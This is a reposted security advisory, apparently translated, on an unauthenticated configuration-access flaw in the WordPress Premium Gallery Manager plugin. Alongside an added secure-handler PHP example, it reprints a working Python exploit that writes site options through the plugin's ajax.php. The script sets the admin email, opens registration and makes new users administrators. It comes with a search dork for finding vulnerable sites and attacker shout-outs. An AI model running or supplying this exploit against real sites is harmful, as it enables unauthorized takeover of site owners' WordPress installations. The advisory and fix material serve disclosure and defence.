WordPress Premium Gallery Manager plugin 'option

Release date: 2014-09-05
Updated: 2014-09-09

Affected systems:
WordPress Premium Gallery Manager
Description:
BUGTRAQ ID: 69663

The WordPress Premium Gallery Manager plugin creates image galleries on demand.

The WordPress Premium Gallery Manager plugin has an access-bypass vulnerability in the implementation of option_panel/ajax.php: the endpoint saves option values without verifying that the caller is authenticated or authorized. Successful exploitation lets an attacker bypass certain security restrictions and perform unauthorized operations.
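As an added example (not the plugin's code and not the advisory author's), the shape of a WordPress AJAX option-save handler that has the checks whose absence this advisory describes: a nonce, a capability check, and an allowlist of option names. The hook name, nonce action and option names are assumptions.

```php
<?php
// Added example, not the plugin's code: an option-save AJAX handler with the
// checks option_panel/ajax.php lacked. Hook name, nonce action and the
// pgm_* option names are assumptions made for this illustration.

// Registered under wp_ajax_ only (logged-in users). There is deliberately no
// wp_ajax_nopriv_ registration, so anonymous requests never reach this code.
add_action( 'wp_ajax_pgm_save_options', 'pgm_save_options_handler' );

function pgm_save_options_handler() {
    // 1. CSRF: the request must carry a nonce issued to this user for this action
    //    (check_ajax_referer() terminates the request on failure).
    check_ajax_referer( 'pgm_save_options', 'nonce' );

    // 2. Authorization: being logged in is not enough; require the capability
    //    that governs site settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Input allowlist: only this plugin's own options may be written, so the
    //    endpoint cannot be used to flip core settings such as default_role or
    //    users_can_register, even by a caller who passed checks 1 and 2.
    $allowed = array( 'pgm_gallery_columns', 'pgm_thumb_size', 'pgm_lightbox' );
    $values  = ( isset( $_POST['values'] ) && is_array( $_POST['values'] ) ) ? $_POST['values'] : array();
    $saved   = array();

    foreach ( $values as $entry ) {
        $name = isset( $entry['name'] ) ? sanitize_key( $entry['name'] ) : '';
        if ( ! in_array( $name, $allowed, true ) ) {
            continue; // drop anything outside the allowlist
        }
        $value = isset( $entry['value'] ) ? sanitize_text_field( wp_unslash( $entry['value'] ) ) : '';
        update_option( $name, $value );
        $saved[] = $name;
    }

    wp_send_json_success( array( 'saved' => $saved ) );
}
```

The three checks are independent: the nonce and capability checks stop the unauthenticated write the PoC below performs, while the allowlist limits the damage if either of those is later misconfigured.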

<*Source: Hannaichi*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!
#Exploit Title : Wordpress Plugin Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
#Author : Hannaichi [@dntkun]
#Date : February 5th, 2014
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : Unauthenticated Configuration Access
#Tested On : Windows 7 32-bit | Google Chrome

#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))

#Exploit : [PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php

#POC :
Save File As Python (.py) =
# Python 2 script (httplib/urllib; not valid Python 3)
import httplib, urllib

# target site
site = "victim"  # <--- host only, no http:// or https://
# path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    # POST one name/value pair to the plugin's 'save' action
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()

ChangeOption(site, url, "admin_email", "youremail@test.com")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"


#Place It Broo No Lazy For This :D !!

--------------------------------------------------------------------------------------------------------------------

Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*

Recommendation:
Vendor patch:

WordPress
 ---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:


When reposting, cite the source: http://www.heiqu.com/d00c7779abb13197f299f455db0f8903.html